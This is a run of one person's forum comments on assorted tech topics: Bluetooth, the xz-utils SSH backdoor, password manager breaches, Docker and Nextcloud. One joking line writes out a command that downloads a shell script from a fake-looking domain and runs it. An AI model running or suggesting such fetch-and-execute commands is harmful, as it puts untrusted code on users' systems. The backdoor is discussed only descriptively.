I assume the problem is hardware. Matt’s hardware didn’t work well with LM, therefore Matt thinks LM sucks… I do wish there was better hardware support but it’s the reason apple went with 1 product = 1 OS = 1 general set of hardware. Sure not every iPhone has the same hardware, but that’s why they have the model numbers, and it’s so much easier to test 200 model mixes than 2,000,000 (Android). Windows gets all the debug info sent directly to them like the others but they also have a huge stack of hardware they can use or they can buy it to test.

This should have been much more well thought out The wording, image, buttons, specific wording for each page.

They really screwed the pooch.

Another 4-6 months minimum before release. But quarterly numbers must be met.

wget toteslegitdebian.app/installer.sh & chmod +x && ./installer.sh

was I not supposed to do that? but staxoverflown said it’s OK.

That does go a long way towards explaining why there are so many Bluetooth vulnerabilities, thanks for the info. Looking at the list of Bluetooth protocols wiki page gives me a headache. Surely there is a better standard, and I see things like HaLow, ZigBee, Z-Wave and other custom protocols, but it seems like there should be a very cleanly well-documented alternative to do the basics that everyone expects BT to do. This, coming from a total noob, speaking completely out of my anus. I just know that as a BT user, it’s a crapshoot whether there will be major audio delay, and pause/play actually worked, that’s if pairing works in the first place. But if something did come along I wonder if there would even be adoption among consumer devices.

Is it true the Bluetooth network stack is larger than the WiFi network stack? If so, why? I don’t know much about BT besides pairing, allowing calls and audio in/out, transferring files, and… is there more? It takes a day of reading documentation to understand all the advanced options on my ASUS router interface, and that’s without anything proprietary.

I’m just surprised and curious and never got a satisfying answer.

Honeypot? Dunno. Good discussions about it on hacker news.

And have eyes good enough to look very closely and detect any small . or `s that are out of place, and be current on all methods of sanitization, catching any and all confusing variable names doing funny things, and never getting mentally overloaded doing it.

I wouldn’t be surprised at all if teams at NSA & co had game months where the teams that find the highest number of vulns or develop the most damaging 0day exploits get a prize and challenge coin. Then you have the teams that develop the malware made to stay stealthy and intercept data for decades undetected, and the teams that play mail agent and intercept packages containing core internet backbone routers to put hardware ‘implants’ inside them.

These are the things Snowden showed us a small sliver of in 2013, over a decade ago, some of which was well aged by that point.

The days of doing illegal things for funsies on the internet, like learning how to hack hands-on, are over if you don’t want to really risk prison time. Download vulnerable virtual machines and hack on those.

But if you’re worried about a random maintainer or packager inserting something like a password stealer or backdoor and letting it hit a major distro with a disastrous backdoor that doesn’t require a PhD in quantum fuckography to understand, chances are likely big brother would alert someone to blow the whistle before it hit production, as they likely did with xzutils.

https://www.thc.org/segfault/

Chances are this is a kid or NEET and all his friend wants is a super simple website with basic info for his local business. Dad is either doing him a favor, or giving him some pocket change so he’ll stop bothering him for money for a month. This is what happens when you don’t teach your children to be adults, and give them everything instead. Seen it too many times.

Based on this interaction alone and his dad deciding the price for him, I’m going to make the wildly assumptious assumption this is a 20s/30s(/40s?) unemploymed guy living at his dad’s house rent free.

If my assumptions are incorrect, sorry mate, you did not win the dad lottery.

That was supposed to be or, not of.

In turn it compromises ssh authentication allows remote code execution via system(); if the connecting SSH certificate contains the backdoor key. No user account required. Nothing logged anywhere you’d expect. Full root code execution.

https://news.ycombinator.com/item?id=39877312

There is also a killswitch hard-coded into it, so it doesn’t affect machines of whatever state actor developed it.

https://news.ycombinator.com/item?id=39881018

It’s pretty clear this is a state actor, targeting a dependency of one of the most widely used system control software on Linux systems. There are likely tens or hundreds of other actors doing the exact same thing. This one was detected purely by chance, as it wasn’t even in the code for ssh.

If people ever wonder how cyber warfare could potentially cause a massive blackout and communications system interruption - this is how.

No mention of the affected models?

I have a Flipper Zero (and case and the extra components) that I’ll 99.99% likely never use. I’d love to get cash for it but I’d be asking twice what it’s worth because I like having it on ‘what if’ grounds.

But I feel you, it’s unfortunate about the state of things. The EU just banned privacy coins. US is soon coming I’m sure. They won’t allow people to legally use them after the release of a central bank coin.

Is docker virtualized or otherwise emulating something? It’s just a way to package things, like an installer? Then it’s bare metal.

I had to look this up too, I thought docker containers were virtualized.

That would make sense if the cause is some looping from hanging DNS lookups. Someone should (and likely has) notified the devs about this.

Another possible solution, from https://help.nextcloud.com/t/server-hangs-and-then-is-fine-for-a-bit-then-hangs-again/153917/16

In theory, if I were to use an online solution, bad actors wouldn’t be able to pull my vault from memory.

It’s the same issue once you login to your vault via browser extension. They have to download your vault locally on login to decrypt it when you enter your password anyway*. Even if they don’t store your vault password in memory, they either store the entire vault (unlikely for size reasons) or a more temporary key to access the vault. Local compromise is full compromise already.

*If they don’t, then they either made a giant technological leap, or they’re storing your passwords on a simple database on their servers and that’s not what you want from a password manager.

Yup, I have been using KeePassXC locally since (one of) the first big LastPass breaches. I thought “password manager company… they know encryption” and then kept some of the most important things stored in my vault including notes of Bitcoin seedphrases etc. Thought "even if they get hacked, they wouldn’t let anyone exfil the huge amount of data from the USER VAULT SERVER… thought “my passphrase is like 25-30 chars long, nobody will crack that”…

5 years after my last login and I find out the breach happened, user vaults were exfil’d, the encryption was absolute shit, and the notes weren’t even encrypted.

I don’t trust cloud companies to keep promises or know what they’re doing today. and anything self-hosted isnt Internet accessable unless it’s on dedicated hardware subnetted off and wouldn’t matter if it got hacked.

Curious if their proxy host was cloudflare or DDoS-Guard (Russian) or even a lesser known service.